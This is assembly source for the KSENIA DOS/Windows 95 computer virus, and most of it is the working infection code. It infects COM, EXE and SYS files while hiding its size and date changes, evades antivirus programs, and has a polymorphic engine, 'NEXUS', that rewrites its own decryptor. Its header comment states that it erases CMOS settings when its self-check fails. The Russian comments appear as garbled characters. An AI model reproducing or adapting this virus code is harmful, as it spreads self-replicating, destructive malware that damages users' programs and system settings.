ᥣ Environment xor si,si mvs es,cs lea di,windir ; ES:DI -> WINDIR= wdlook4: call compare ; ࠢ envir 蠡 jz wdfound cmp w [si],0 jz fverror inc si jmp wdlook4 wdfound: add si,11 ; SI -> ४ windows lea di,stacks lodsb stosb or al,al jnz $-4 mvs ds,cs lea bx,[di-1] lea si,fixes fvinfect: cmp b [si],0 jz fverror mov di,bx lodsb stosb or al,al jnz $-4 mov ax,1857h lea dx,stacks int 21h jmp fvinfect fverror: call LoadRegs ; ⠭ ॣ஢ ret ; Open/Close SFT - ணࠬ / ଠ쭮 SFT OpenSFT: call SaveRegs ; ࠭ ॣ஢ mov si,0 ; "Open" jmp Manipulate CloseSFT: call SaveRegs ; ࠭ ॣ஢ mov si,1 ; "Close" Manipulate: mov bp,bx ; ࠭ handle call HandleCheck ; ஢ઠ, 䠩 chardevice jc SFT_Error mov ax,1220h ; 祭 JFT ⮣ 䠩 int 2fh jc SFT_Error xor bx,bx mov bl,es:[di] ; BL = System file entry cmp bl,0ffh je SFT_Error mov ax,1216h ; 祭 SFT ES:DI int 2fh jc SFT_Error mov bx,bp ; ⠭ handle call Inf_Check ; ஢ઠ ஢ 䠩 jnc SFT_Error ; 室 砥 ⮣ 䠩 mov eax,vsize cmp si,0 ; "Open"? jz open neg eax open: add es:[di+11h],eax ; ࠭ SFT ࠧ mov dx,es:[di+0fh] ; 祭 䠩 call hidestm ; ⨥ 譨 100 cmp si,0 ; "Open"? jnz clsft ror dh,1 ; 㢥祭 䠩 add dh,100 rol dh,1 clsft: mov es:[di+0fh],dx ; ࠭ SFT_Error: call LoadRegs ; ⠭ ॣ஢ ret ; ஢ઠ ⨢ Win95 (ᯮ WinOldAp) WinOldAp: mov ax,1700h ; 㭪 WinOldAp Installation Check int 2fh ; ணࠬ, Win95 ret ; 32-ࠧ來 PE ० get_dup: push ds si ; 㧪 ॣ஢ ES:BX ਣ mvs ds,0 ; ஬ 21- 뢠 mov si,63h*4 mov bx,[si] mov es,[si+2] pop si ds ret set_dup: push ds si ; ࠭ ES:BX 63- mvs ds,0 ; 뢠 mov si,63h*4 mov [si],bx mov [si+2],es pop si ds ret chk_dup: push ds si eax ; ஢ઠ 63- mvs ds,0 ; 뢠 mov si,63h*4 mov eax,[si] cmp D cs:io21p,eax pop eax si ds ret ; size stealth ; ES:SI -> 䠩 ; ES:DI -> 䠩 sizst: mov dx,es:[si] ; dx = 䠩 call hidestm ; ᪨஢ ஢ઠ 100 譨 jnc oklen ; 䠩 ஢? mov W es:[si],dx ; ⠭ ଠ 䠩 sub W es:[di],vsize ; ᪨஢ 饭 䠩 sbb W es:[di+2],0 oklen: ret hidestm: push dx ; ࠭ ⥪ shr dh,1 ; 䠩 cmp dh,100 ; ࠢ 100 pop dx ; ⠭ jb okinf ror dh,1 ; 䠩 sub dh,100 ; 譥 rol dh,1 ; stc ; 䠩 ࠦ! ret okinf: clc ret correctdate: mov ax,5700h ; ⠭ 䠩 ᨬ call int21 ; ⮣, ࠦ call HideStm ; ଠ쭠 call Inf_Check ; ஢ 䠩 ࠦ jnc okdat ror dh,1 add dh,100 rol dh,1 okdat: mov ax,5701h ; ⠭ ⪮४஢ call int21 ; 䠩 ret ; ஢ઠ 䠩 (AVs ) ; ஢ઠ ७ 䠩 (Extens) ; SAVE_AX=4B00 ࠬ஢ cmdline Filename: call SaveRegs ; ࠭ ॣ஢ cld mov si,dx ; ᬥ饭 ॣ nfind: lodsb ; 䠩 cmp al,':' ; 襬 砥 㤥 ᫥ jz separ ; ᫥ "/", "\", ":" cmp al,'\' jz separ cmp al,'/' jnz store separ: mov dx,si ; ࠭ ᬥ饭 store: or al,al ; ஢ઠ ப (0) jnz nfind mov si,dx ; SI -> 䠩 xor di,di ; ७ gext: lodsb cmp al,'.' ; ७? jnz $+4 mov di,si or al,al jnz gext or di,di ; ᫨ 祪 䠩 jz Bad_File ; 㦥 뫮 lea bp,[di-1] ; ᥩ BP-७ 䠩, DX- mvs es,cs ; ES=CS cmp cs:save_ax,4b00h jne no_add mov si,dx ; SI -> 䠩 lea di,prms ; ⠡窠 (ଠ: avname,0,0,cmdline,0dh) scancmd: call compare ; ࠢ ᪠ ணࠬ jz addprm ; ।ᬮ७ ⠡ mov al,0dh mov cx,0ffffh repne scasb cmp b cs:[di],0 ; ⠡? jnz scancmd ; ⠡ - 饭 jmp no_add ; 㣠 ணࠬ addprm: push es ; ࠭ ES mov al,0 mov cx,0ffffh repne scasb lea si,[di+1] les bx,d cs:save_bx ; 㧪 ES:BX EPB les bx,es:[bx+2] ; 㧪 ப ES:BX mov di,bx getdx: inc di ; ᪠㥬 ப cmp b es:[di],0dh ; ப? jnz getdx mov cx,-1 ; 稪 ⥫쭮 ࠬ lods b cs:[si] ; 㧪 ࠬ stosb ; ࠭ ࠬ inc cx ; 㢥祭 稪 cmp al,0dh ; ஢ઠ 砭 ࠬ jnz $-6 add es:[bx],cl ; 㢥祭 ப pop es ; ⠭ ES no_add: mov si,bp lea di,extens ; ES:DI 㪠뢠 ⠡ call compare ; ࠧ襭묨 ७ﬨ jnz Bad_File ; ४⭮ ७? mov si,dx ; SI -> 䠩 lea di,AVs ; ES:DI -> ⠡ call compare ; ࠢ jz Bad_File ; 襥 digit: lodsb ; ஢塞, 䠩 cmp al,'0' jb nodig cmp al,'9' jbe Bad_File nodig: or al,al jnz digit call LoadRegs ; ⠭ ॣ஢ clc ; ⪠ CF ret Bad_File: call LoadRegs ; ⠭ ॣ஢ stc ; ⠭ CF ret ; ⠭ STF ᨬ ⥪饣 PSP/MCB ; ࠢ 1 ᫨ ⥪騩 MCB ਭ ணࠬ STLOCK ; ࠢ 0 ᫨ ⥪饣 MB ॣ஢ STLOCK ; COMMAND ࠢ 1 ᫨ ⥪騩 MB ਭ command.com' mcbcheck: call SaveRegs ; ࠭ ॣ஢ mov ah,62h ; ᥣ ⥪饣 PSP call int21 dec bx ; 祭 ᥣ MCB mov ds,bx ; DS:SI 㪠뢠 MB mov si,08h ; lea di,stlock ; ES:DI 㪠뢠 mvs es,cs ; ᯨ᮪ STLOCK call compare ; ࠢ sete cs:stf ; ⠭ ⥫-䫠 lea di,comspec ; ஢ઠ ⥪饣 call compare ; command.com sete cs:command call LoadRegs ; ⠭ ॣ஢ ret ; 室 ணࠬ ; COMPARE - ࠢ ; DS:SI - 筨 ; ES:DI - ⠡ (Data1,0,Data2,0,...,DataN,0,0) ; 室: ZF = 1 砥 ᮢ ; ⨭᪨ 㪢 祭 compare: call SaveRegs ; ࠭ ॣ஢ mov dx,si ; 㡫஢ ᬥ饭 筨 data1: mov si,dx ; ⠭ ᬥ饭 筨 data2: mov al,ds:[si] ; ⥭ 筨 mov ah,es:[di] ; ⥭ ⠡ inc di ; 㢥祭 ॣ஢ inc si ; call upreg ; ॢ ᨬ 孨 ॣ or ah,ah ; ᫨ ⠡ ࠧ 0 => jz equal ; => ᮢ cmp al,ah ; ⭮ ࠢ jz data2 ; ᫨ ᮢ, ஢塞 data3: cmp B es:[di],0 ; ᮢ, ६ ᫥饥 jz data4 ; inc di jmp data3 data4: inc di cmp B es:[di],0 ; ஢ઠ ᫥ jnz data1 ; ⠡ call LoadRegs ; ⠡ 稫: ᮢ cmp di,-1 ; ⪠ ZF ret ; 室 ணࠬ equal: call LoadRegs ; ⠭ ॣ஢ cmp al,al ; ⠭ ZF ret ; 室 ணࠬ ; ࠭ 㧪 ॣ஢ ⥪ ; FLAGS EAX BX CX DX SI DI BP ES DS SaveRegs: pushf ; ࠭ ᠬ ॣ஢ push eax bx cx dx si di bp es ds mov bp,sp push w [bp+22] ; ஢ mov bp,[bp+4] ; ⠭ BP ret LoadRegs: mov bp,sp ; ஢ pop W [bp+24] ; 祩 ⥪ (⠫ SaveRegs) pop ds es bp di si dx cx bx eax popf ret ; Gets a random value [0..AL] get_rnd: push bx cx dx si di mov si,ax mov ax,cs:random1 mov bx,cs:random2 mov cx,ax mov di,8405h mul di shl cx,3 add ch,cl add dx,cx add dx,bx shl bx,2 add dx,bx add dh,bl shl bx,5 add dh,bl add ax,1 adc dx,0 mov cs:random1,ax mov cs:random2,dx or si,si jz rnd_exit rnd_fail: sub ax,si jnc rnd_fail add ax,si and eax,0ffffh rnd_exit: pop di si dx cx bx ret ; ணࠬ ⠭/ 뢠 ; ᪨ 訡 int 24h Hook24: call SaveRegs ; ࠭ 墠 xor ax,ax ; 뢠 ᪨ mov ds,ax ; 訡 int 24h mov si,24h*4 mov dx,cs lea ax,int24 xchg ax,[si] xchg dx,[si+2] mov cs:io24,ax mov cs:io24+2,dx call LoadRegs ret Remove24: call SaveRegs ; ⠭ int 24h xor ax,ax mov ds,ax mov si,24h*4 mov ax,cs:io24 mov dx,cs:io24+2 mov [si],ax mov [si+2],dx call LoadRegs ret ; ணࠬ ࠡ 䠩 LFNOpenFile: ; LFN ⨥ 䠩 mov ax,716ch mov si,dx mov dx,1 ; ⨥ 䠩 mov bx,2 ; 訡 ᫨ 뢠 call int21 xchg ax,bx ret OpenFile: ; ⨥ 䠩 mov ax,3d02h call int21 xchg ax,bx ret GetDate: ; 祭 ६ mov ax,5700h ; ᫥ 䠩 call int21 mov cs:time,cx mov cs:date,dx ret RestDate: ; ⠭ ६ mov ax,5701h ; 䠩 mov cx,cs:time mov dx,cs:date call int21 ret Write: mov ah,40h ; 䠩 call int21 ret Read: mov ah,3fh ; ⥭ 䠩 call int21 ret CloseFile: mov ah,3eh ; ⨥ 䠩 call int21 ret LFNClrAttrib: mov ax,7143h ; LFN 祭 ⪠ ਡ⮢ mov bl,0 ; 䠩 call int21 jc ClrFailed mov cs:Attrib,cx mov cs:fn_ptr,dx mov cs:fn_ptr+2,ds mov ax,7143h mov bl,1 xor cx,cx call int21 jmp ClrFailed ClrAttrib: mov ax,4300h ; 祭 ⪠ ਡ⮢ call int21 ; 䠩 jc ClrFailed ; ⠪ ࠭ 㪠⥫ 䠩 mov cs:Attrib,cx mov cs:fn_ptr,dx mov cs:fn_ptr+2,ds mov ax,4301h xor cx,cx call int21 ClrFailed: ret LFNRestAttrib: mov ax,7143h ; LFN ⠭ ਡ⮢ mov bl,1 ; 䠩 ࠭ 㪠⥫ mov cx,cs:Attrib mov dx,cs:fn_ptr mov ds,cs:fn_ptr+2 call int21 ret RestAttrib: mov ax,4301h ; ⠭ ਡ⮢ mov cx,cs:Attrib ; 䠩 ࠭ 㪠⥫ mov dx,cs:fn_ptr mov ds,cs:fn_ptr+2 call int21 ret SeekSave: call SaveRegs ; ࠭ 樨 xor cx,cx ; 㪠⥫ (lseek) 䠩 xor dx,dx call seekfrom_cur mov cs:seek_pos,ax mov cs:seek_pos+2,dx call LoadRegs ret RestoreSeek: call SaveRegs ; ⠭ ࠭ mov dx,cs:seek_pos ; 樨 㪠⥫ 䠩 mov cx,cs:seek_pos+2 call seekfrom_bof call LoadRegs ret seek2bof: mov ax,4200h ; ⠭ 㪠⥫ xor cx,cx ; 砫 䠩 xor dx,dx jmp realseek seek2eof: mov ax,4202h ; ⠭ 㪠⥫ xor cx,cx ; 䠩 xor dx,dx jmp realseek seekfrom_eof: mov ax,4202h ; ⠭ 㪠⥫ jmp realseek ; 䠩 seekfrom_cur: mov ax,4201h ; ⠭ 㪠⥫ jmp realseek ; ⥪饩 樨 seekfrom_bof: mov ax,4200h ; ⠭ 㪠⥫ ; 砫 䠩 realseek: call int21 ret ; ࠡ稪 int 24h int24: mov al,3 ; AL=3: 訡 iret ; ᥢ int 21h int21: pushf ; ⥪ 䫠 push cs ; ᥣ call exithandler ; ࠢ ୥ ⥪ ret ; ஢ઠ 䠩 (᪮?) HandleCheck: call SaveRegs ; ࠭ ॣ஢ mov ax,4400h ; IOCTL: Get device info call int21 jc Invalid ; bad handle? test dl,80h ; ஢ઠ 7- jnz Invalid ; ᫨ 0, ᪮ 䠩 call LoadRegs ; ⠭ ॣ஢ clc ret Invalid: call LoadRegs ; ⠭ ॣ஢ stc ret ; ॢ ⨭᪨ ᨬ AH AL 孨 ॣ upreg: cmp al,61h ; 'a' jb badal cmp al,7ah ; 'z' ja badal sub al,20h ; 's'->'S' badal: cmp ah,61h ; 'a' jb badah cmp ah,7ah ; 'z' ja badah sub ah,20h ; 's'->'S' badah: ret ; SeekHide ; ᫨ lseek 室 ⥫ , ணࠬ ७ ; ࠭ ࠦ ணࠬ, .. ⮩ ணࠬ ; SEEK_POS ᮤঠ lseek ; NRBYTES 㬥蠥 ࠧ 権 seekhide: call SaveRegs ; ࠭ ॣ஢ call SeekSave ; ࠭塞 ⥪饥 㪠⥫ mov cx,-1 ; 㪠⥫ ࠭ mov dx,-vsize ; ணࠬ call seekfrom_eof ; DX:AX - sub ax,cs:seek_pos ; SEEK_POS - sbb dx,cs:seek_pos+2 cmp dx,-1 ; DX:AX ⥫ jnz not_us or ax,ax jns not_us neg ax ; 祭 ࠧ 権 sub cs:nrbytes,ax ; 㬥襭 ⢠ ⠭ ⮢ sub cs:seek_pos,ax ; 㬥襭 樨 㪠⥫ 䠩 sbb cs:seek_pos,0 ; .. ᬥ饭 not_us: call RestoreSeek ; ⠭ 樨 㪠⥫ call LoadRegs ; ⠭ ॣ஢ ret ; CRC crc: push si cx lea si,shield mov cx,end_crc-shield call crc32 pop cx si ret CRC32: push ebx ecx edx esi edi ds cld mov di,cx mov ecx,-1 mov edx,ecx mvs ds,cs NextByteCRC: xor eax,eax xor ebx,ebx lodsb xor al,cl mov cl,ch mov ch,dl mov dl,dh mov dh,8 NextBitCRC: shr bx,1 rcr ax,1 jnc NoCRC xor ax,08320h xor bx,0edb8h NoCRC: dec dh jnz NextBitCRC xor ecx,eax xor edx,ebx dec di jnz NextByteCRC not edx not ecx mov eax,edx rol eax,16 mov ax,cx pop ds edi esi edx ecx ebx ret ; ஢ handle Infect_Handle: push cs cs ; ds es 뢠 pop ds es call HandleCheck ; ஢ઠ 䠩 䨪⨢ (disk file?) jc close call Inf_Check ; ஢ઠ 䠩 ୮ ࠦ jc close mov cx,32 ; ⥭ 䠩 lea dx,original call read cmp cx,ax ; DOS 襭 jne close ; ⥭ ? lea si,original ; ᤥ ਣ쭮 lea di,header ; 砫 ணࠬ mov cx,32 cld rep movsb lea di,header mov ax,[di] ; ax 2 cmp ax,'ZM' ; ஢ઠ EXE ⨯ je exeinfect cmp ax,'MZ' ; ⠪ EXE譨 je exeinfect ; ⠪ 뢠 ; ஢ COM 䠩 ; DI - , 㦭 ஢ call seek2eof ; 祭 ࠧ 䠩 or dx,dx ; ࠧ 䠩 65535 ? jnz Close cmp ax,65035-vsize ; ஢ઠ 䠩 ९ ja Close ; ⠢ ⥪ PSP mov B [di],0e9h ; JMP mov delta,ax ; ⥫쭮 ᬥ饭 sub ax,3 ; ४ ( ࠧ jump') mov W [di+1],ax ; 室 jmp check ; ஢ EXE 䠩 ; DI - , 㦭 ஢ exeinfect: cmp B [di+18h],'@' ; ஢ઠ 䠩 ਭ je Close ; ᥬ WinNE 䠩 mov ax,W [di+4] ; ࠬ PageCnt mov cx,W [di+2] ; ࠬ PartPag or cx,cx ; ᫨ ᫥ ࠭ ࠢ jz $+3 ; , ࠬ PageCnt ᮤন dec ax ; ⥫쭮 mov dx,512 ; 㬭 512 (祭 ) mul dx add ax,cx ; 祭 EXE 䠩, adc dx,0 ; 㧨 ᪥ EXE push dx ax ; ࠭ ६ ⥪ call seek2eof ; 祭 ᪮ ࠧ 䠩 pop si cx ; 㧪 ࠬ஢ ⥪ cmp si,ax ; ࠢ ࠬ஢ ( jnz Close ; 直 overlay ) cmp cx,dx jnz Close ; 祭 訥 䠩 室 cmp dx,10 ; ??? ⠪ jae Close ; 뢠 (砥 divide overflow ) push ax dx ; ࠭ ࠬ஢ mov cx,16 ; 祭 室 窨 (CS:IP), div cx ; ᯮ ⮣ EXE 䠩 sub ax,[di+8] ; ⠭ ࠧ EXE mov delta,dx ; ⥫쭮 ᬥ饭 sub ax,10h ; COM 䠩 (IP /ࠢ 100h) add dx,100h mov W [di+14h],dx ; ࠭ IP mov W [di+16h],ax ; ࠭ CS mov W [di+0eh],ax ; ࠭ SS ( TBSCAN ) mov W [di+10h],-2 ; ࠭ SP pop dx ax ; 㧪 ࠬ஢ ⥪ add ax,vsize ; ࠧ 䠩 adc dx,0 ; mov cx,512 ; ⠥ PartPag PageCnt div cx ; 䠩 ᮬ or dx,dx jz $+3 inc ax mov [di+2],dx ; ࠭ PartPag mov [di+4],ax ; ࠭ PageCnt Check: call WriteVirus ; 䠩 Close: call CorrectDate ; ࠢ ஢ 䠩 ret ; ஢ ⥫ 䠩 writevirus: call GetDate ; ६/ 䠩 cmp cs:save_ax,1857h; ஢ઠ 室 ࢥન jz no_time ; ६ 䠩 mov ah,2ch ; ⥪饣 ६ call int21 ; dx:cx mov ax,cs:time ; ax ६ 䠩 shr ah,3 ; ६ ( 11-15 cx) cmp ah,ch ; ᮢ? ᫨ , 뢠, je write_fail ; ⮡ ᢥ no_time: call seek2eof ; -> call nexus call write ; 뢠 䠩 xor cx,ax ; ᠫ? jnz write_fail call seek2bof ; 砫 mov cx,32 ; com/exe 䠩 lea dx,header call write write_fail: call RestDate ; ⠭ 䠩 ret ; ஢ઠ 䠩 ஢ Inf_Check: call SaveRegs ; ࠭ ⥪ ॣ call SeekSave ; ࠭塞 lseek mov cx,-1 ; ७ᨬ 㪠⥫ 砫 mov dx,-vsize ; ⥫ call seekfrom_eof mov cx,vsize ; ⠥ ਯ lea dx,buffer push cs cs pop ds es call read call RestoreSeek ; ⠭ lseek xor cx,ax ; ⠫? jnz not_infected lea si,v_id lea di,[buffer+(signature-ksenia)] mov cx,ssize cld repe cmpsb jnz not_infected call LoadRegs stc ret not_infected: call LoadRegs clc ret ; CRLOAD - ணࠬ 祭 ਣ쭮 砫 ; ࠦ ணࠬ ஢ ⮩ ணࠬ ; 室: BX - handle ஢ ணࠬ ; 室: "buffer" ᮤন 32 ਣ crload: call SaveRegs ; ࠭ ॣ஢ push cs cs ; 樠 ᥣ ॣ஢ pop ds es xor cx,cx ; ࠭ 樨 㪠⥫ 䠩 xor dx,dx call seekfrom_cur push dx ax mov cx,-1 ; (.. ᠭ mov dx,-vsize ; ணࠬ, 砫 㤥 ᯮ- call seekfrom_eof ; VSIZE 䠩) mov cx,vsize ; ⠥ ஢ lea dx,buffer ; call read pop dx cx ; ⠭ 㪠⥫ call seekfrom_bof mov si,w [buffer+(nex_ptr-ksenia)] mov ax,[si+1] ; ⥭ ஢騪 and ah,not 111b or ah,101b ; ஢ ॣ஬ DI mov w do_enc,ax test al,10b ; ஢ઠ 室 mov al,[si+3] ; ⥭ jz _key mov al,90h _key: mov B do_enc+2,al mov B do_enc+3,0c3h ; ࠭ RET 祩 mov cx,32 ; ⮢ ஢ lea si,[buffer+(original-ksenia)] lea di,buffer crge: lodsb ; ⥭ mov [di],al ; ࠭ call near ptr do_enc ; ஢ inc di ; loop crge call LoadRegs ; ⠭ ॣ஢ ret ; Polymorphic engine [NEXUS] ; "DELTA" = delta offset in file ; OUT - CX = virus size ; OUT - DX = polymorph code nexus: call SaveRegs ; 樠 push cs cs pop ds es cld lea di,buffer mov w r_used,-1 ; ॣ஢ ᯮ call garbage ; mov wflag,2 ; get random count register call get_reg mov r_used,al or al,10111000b ; create MOV opcode stosb ; save it mov ax,vsize-crlen stosw call garbage ; put some garbage get_idx: call get_reg ; get random index register (BX DI SI) mov ah,111b ; check if BX register cmp al,011b je got_idx mov ah,100b ; check if SI register cmp al,110b je got_idx mov ah,101b ; check if DI register cmp al,111b jne get_idx got_idx: mov r_used +1,al mov rm_field,ah or al,10111000b ; create MOV opcode stosb ; save it mov offs_ptr,di ; save ptr to the offset mov ax,? stosw call garbage ; put some garbage bad_crypt: mov cr_ptr,di mov ax,ctotal ; choose random encryptor lea si,crins call get_rnd imul ax,(cp2n-crins) add si,ax mov ax,W [si] ; read encrypt opcode or ah,101b ; encrypt with DI mov W do_enc,ax mov ax,0ffh ; get any random value call get_rnd inc ax test B do_enc,10b ; ஢ઠ 室 jz stos_it mov al,90h stos_it: mov do_enc+2,al mov B do_enc+3,0c3h ; ࠭ RET 祩 mov al,[di] ; check if it realy crypts byte call near ptr do_enc cmp al,[di] mov [di],al jz bad_crypt mov al,2eh stosb mov ax,W [si+2] ; read decrypt opcode or ah,rm_field ; update opcode stosw test al,10b ; ஢ઠ 室 jnz no_stos mov al,do_enc+2 stosb no_stos: call garbage ; put some garbage mov al,01000000b ; update index register or al,r_used +1 stosb call garbage ; put some garbage mov al,01001000b ; update count register or al,r_used stosb mov al,01110101b ; jnz stosb mov ax,cr_ptr sub ax,di dec ax stosb mov si,di sub si,offset buffer mov ax,crlen sub ax,si call fixedfill ; put AX bytes of the garbage mov ax,di ; calculate decryptor size sub ax,offset buffer-100h add ax,delta mov si,offs_ptr mov [si],ax ; copy virus body to the buffer and encrypt it "on the fly" mov cx,shield-ksenia-crlen lea si,ksenia+crlen lea di,buffer+crlen rep movsb mov cx,original-shield-1 dupcr: lodsb sub al,[si] stosb loop dupcr mov cx,eov-original+1 rep movsb ; polymorph it! mov cx,vsize-crlen lea di,buffer+crlen _encr: call near ptr do_enc inc di loop _encr lea si,v_id lea di,[buffer+(signature-ksenia)] mov cx,ssize rep movsb mov ax,cr_ptr mov w [buffer+(nex_ptr-ksenia)],ax call LoadRegs mov cx,vsize lea dx,buffer ret ; ணࠬ 樨 ୮ ⠡ ; ⢥ 室 ࠬ஢ ⠭ ES:DI १ maxg equ crlen/7 ; maximum number of garbage bytes fixedfill: ; fixed number of garbage bytes (AX) call SaveRegs jmp fill garbage: call SaveRegs mov ax,maxg ; getting random number of garbage call get_rnd ; instructions fill: mov cx,ax ; exit on CX=0 or cx,cx jz garb_ret gloop: push cx di lea si,opcz ; SI -> our table with opcodes and offsets mov ax,total ; get random number of instruction call get_rnd imul ax,op2n-opcz ; get relative offset () add si,ax mov dx,[si] ; read instruction opcode xchg dl,dh mov wflag,0 ; no W field means cmp B [si+2],0ffh ; check if W field required jz no_W mov ax,2 ; get 0 or 1 (B/W) call get_rnd mov wflag,ax ; set value to number of required random inc wflag ; bytes after instruction mov cl,B [si+2] ; read W-bit number shl ax,cl ; set it up or dx,ax ; update opcode no_W: cmp B [si+3],0ffh ; check if REG field required jz no_R call get_reg ; get random register number (REG) mov cl,B [si+3] ; read REG bit number shl ax,cl or dx,ax ; update opcode no_R: xchg ax,dx ; store instruction xchg al,ah ; if instruction the same with the previous cmp al,0feh jae no_store stosb cmp si,offset onebyte jae imm8 xchg al,ah stosb imm8: mov cx,wflag ; get number of random jcxz no_store ; bytes after instruction rndb: mov ax,100h call get_rnd stosb loop rndb no_store: pop ax cx sub ax,di neg ax ; number of bytes of the instruction sub cx,ax ja gloop jz garb_ret add cx,ax sub di,ax jmp gloop garb_ret: mov wflag,di call LoadRegs mov di,wflag ret ; gets random REG field into al without [r_used ] get_reg: mov ax,8 ; get random value call get_rnd mov ah,al cmp wflag,1 ; check REG jnz r16 and ah,11111011b ; 8-bit regs jmp allbits r16: cmp ah,100b ; check for SP REG jz get_reg allbits: cmp r_used,ah ; 16-bit regs jz get_reg cmp r_used+1,ah jz get_reg cbw ret ; encryptors FEDCBA98 76543210 ; dectyptors |||||||| |||||||| crins label byte db 10000000b,00110000b ; XOR db 10000000b,00110000b ; XOR cp2n db 10000000b,00000000b ; ADD db 10000000b,00101000b ; SUB db 10000000b,00101000b ; SUB db 10000000b,00000000b ; ADD db 11000000b,00001000b ; ROR db 11000000b,00000000b ; ROL db 11000000b,00000000b ; ROL db 11000000b,00001000b ; ROR db 11110110b,00010000b ; NOT db 11110110b,00010000b ; NOT db 11110110b,00011000b ; NEG db 11110110b,00011000b ; NEG db 11111110b,00000000b ; INC db 11111110b,00001000b ; DEC db 11111110b,00001000b ; DEC db 11111110b,00000000b ; INC ctotal equ ($-crins)/(cp2n-crins) ; opcodes FEDCBA98 76543210 ; table |||||||| |||||||| opcz db 11000110b,11000000b ; opcode (MOVL) db 8 ; W field ptr (FF if none) db 02h-2 ; "reg" bit ptr (FF if none) op2n db 10000000b,11000000b ; opcode (ADD) db 8 ; W field ptr (FF if none) db 02h-2 ; "reg" bit ptr (FF if none) db 10000000b,11101000b ; opcode (SUB) db 8 ; W field ptr (FF if none) db 02h-2 ; "reg" bit ptr (FF if none) db 10000000b,11111000b ; opcode (CMP) db 8 ; W field ptr (FF if none) db 02h-2 ; "reg" bit ptr (FF if none) db 11110111b,11011000b ; opcode (NEG16) db 0ffh ; W field ptr (FF if none) db 02h-2 ; "reg" bit ptr (FF if none) db 11110111b,11010000b ; opcode (NOT16) db 0ffh ; W field ptr (FF if none) db 02h-2 ; "reg" bit ptr (FF if none) db 10000000b,11100000b ; opcode (AND) db 8 ; W field ptr (FF if none) db 02h-2 ; "reg" bit ptr (FF if none) db 11110110b,11000000b ; opcode (TEST) db 8 ; W field ptr (FF if none) db 02h-2 ; "reg" bit ptr (FF if none) db 10000000b,11001000b ; opcode (OR) db 8 ; W field ptr (FF if none) db 02h-2 ; "reg" bit ptr (FF if none) db 10000000b,11110000b ; opcode (XOR) db 8 ; W field ptr (FF if none) db 02h-2 ; "reg" bit ptr (FF if none) db 10000000b,11011000b ; opcode (SBB) db 8 ; W field ptr (FF if none) db 02h-2 ; "reg" bit ptr (FF if none) db 10000000b,11010000b ; opcode (ADC) db 8 ; W field ptr (FF if none) db 02h-2 ; "reg" bit ptr (FF if none) db 11001101b,00000001b ; opcode (INT 01) db 0ffh ; W field ptr (FF if none) db 0ffh ; "reg" bit ptr (FF if none) db 11001101b,00000011b ; opcode (INT 03) db 0ffh ; W field ptr (FF if none) db 0ffh ; "reg" bit ptr (FF if none) db 01110000b,0 ; opcode (Jxx $+2) db 0ffh ; W field ptr (FF if none) db 0ah-2 ; "reg" bit ptr (FF if none) db 01111000b,0 ; opcode (Jxx $+2) db 0ffh ; W field ptr (FF if none) db 0ah-2 ; "reg" bit ptr (FF if none) db 11100011b,0 ; opcode (Jcxz $+2) db 0ffh ; W field ptr (FF if none) db 0ffh ; "reg" bit ptr (FF if none) db 11101011b,0 ; opcode (Jmp short $+2) db 0ffh ; W field ptr (FF if none) db 0ffh ; "reg" bit ptr (FF if none) onebyte: ; - One-byte instructions db 10110000b,0 ; opcode (MOV) db 0bh ; W field ptr (FF if none) db 0ah-2 ; "reg" bit ptr (FF if none) db 01000000b,0 ; opcode (INC) db 0ffh ; W field ptr (FF if none) db 0Ah-2 ; "reg" bit ptr (FF if none) db 01001000b,0 ; opcode (DEC) db 0ffh ; W field ptr (FF if none) db 0Ah-2 ; "reg" bit ptr (FF if none) db 11001100b,0 ; opcode (int3) db 0ffh ; W field ptr (FF if none) db 0ffh ; "reg" bit ptr (FF if none) db 11111000b,0 ; opcode (S/Cf) db 0ffh ; W field ptr (FF if none) db 0ah-2 ; "reg" bit ptr (FF if none) total equ ($-opcz)/(op2n-opcz) ; CRC end_crc: random1 dw 0 ; 砩 ᥫ random2 dw 0 checksum dd 0f90738adh; CRC32 epb dw 0 ; Execute Parameter Block dw 80h ; ப seg0 dw 0 dw 5ch ; FCB#1 seg1 dw 0 dw 6ch ; FCB#2 seg2 dw 0 original db 0c3h,31 dup (0) nex_ptr dw 0 ; 㪠⥫ ஢騪 signature db ssize dup (0) ; ᪮ - 䠩 eov: io08 dw ?,? ; 祩 ࠭ ஢ io21p dw ?,? ; 뢠 io24 dw ?,? stf db ? ; ० ⥫ (mcbcheck) command db ? ; command.com (mcbcheck) seek_pos dw ?,? ; 㪠⥫ (SeekSave) nrbytes dw ? ; ⠭ (ReadStealth) rm_field db ? ; ࠭ R/M (NEXUS) r_used db ?,? ; 2 ᯮ㥬 ॣ (NEXUS) offs_ptr dw ? ; (NEXUS) cr_ptr dw ? ; (NEXUS) wflag dw ? ; 䫠 W (NEXUS) do_enc db ?,?,?,? ; - (NEXUS/CRLOAD) fn_ptr dw ?,? ; 䠩 (ClrAttrib) attrib dw ? ; ਡ (ClrAttrib) time dw ? ; ६ 䠩 (GetDate) date dw ? ; 䠩 (GetDate) delta dw ? ; +ᬥ饭 (室 ࠬ NEXUS) w95state dw ? ; ﭨ Win95 (筥 WinOldAp) save_ax dw ? ; । ࠬ஢ save_bx dw ? ; १⭮ ࠡ稪 save_es dw ? ; delay db ? ; 稪 Virus Guard header db 32 dup (?) buffer db vsize dup (?) stacks db 100h dup (?) eom: end ksenia [KSENIA.ASM] [KSENIA.ASM] comment KSENIA Virus Version 1.1 Copyright (C) Deadman TSR/COM/EXE/SYS fast polymorphic infector Infects on 1857h/3Dh/41h/43h/4Bh/56h/6Ch/7141h/7143h/7156h/716Ch/71A9h (Internal/Open/Del/Chmod/Exec/Ren/ExtOpen/LFNs/LFN Server Open) Size/Date stealth on 11h/12h/4Eh/4Fh/5700h/5701h/714Eh/714Fh/71A6h (Find First/Next FCB/DTA/LFN + Get/Set File Time/Date + Get Handle Info) Redirection stealth on 3Fh/42h (Read/LSeek) SFT stealth without using any SFT values (for Novell/Win95 compatibility) Disinfects the host on 40h (Write) Re-Hooks Int 21h vector after Win95 installation. Works perfectly! Re-Hooks Int 21h vector if virus handler has been removed from the chain Uses the most safe method of infecting .SYS files for resident virus Every second it calcucates CRC32 and erases CMOS if the CRC is incorrect Virus stays resident in low memory, executing the host with 4B00h function When some of AVs are executing, virus adds some parameters to cmdline Polymorphic in files uses its internal polymorphic engine Engine uses table-based instructions as a random size garbage (85% of 8086) Engine uses different count and index registers Generates different decryptors (ADD/SUB/XOR/NOT/NEG/ROR/ROL/INC/DEC imm8) Has a second internal shield (secondary encrypts itself with a kewl method) Will not infect files with a current hour stamp Will not infect ADINF/COMMAND files Disable stealth if 